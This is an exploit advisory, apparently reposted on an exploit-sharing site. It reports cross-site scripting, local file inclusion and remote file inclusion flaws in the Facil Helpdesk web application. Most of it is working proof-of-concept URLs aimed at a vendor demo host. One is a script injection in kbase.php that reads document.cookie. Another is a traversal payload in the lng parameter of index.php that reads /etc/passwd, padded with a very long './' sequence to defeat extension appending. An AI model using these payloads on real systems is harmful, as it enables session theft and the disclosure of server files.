id: 5632
date: 08/06/2009
title: Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities
author: Moudi
cves: 

=============================================================
Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities
=============================================================



/*


Facil Helpdesk (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Download : http://www.cromosoft.com/en/facilhelpdesk.html

Greetings : Mizoz, Zuka, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in kbase.php (/).

- Poc:
  http://127.0.0.1/kbase.php/[XSS]
  http://www.demo.cromosoft.com/helpdesk/kbase/kbase.php/"><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[LFI]
  http://www.demo.cromosoft.com/helpdesk/index.php?lng=[LFI]

LFI => invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

[+] Exploit RFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[RFI]




#  0day.today [2023-03-22]  #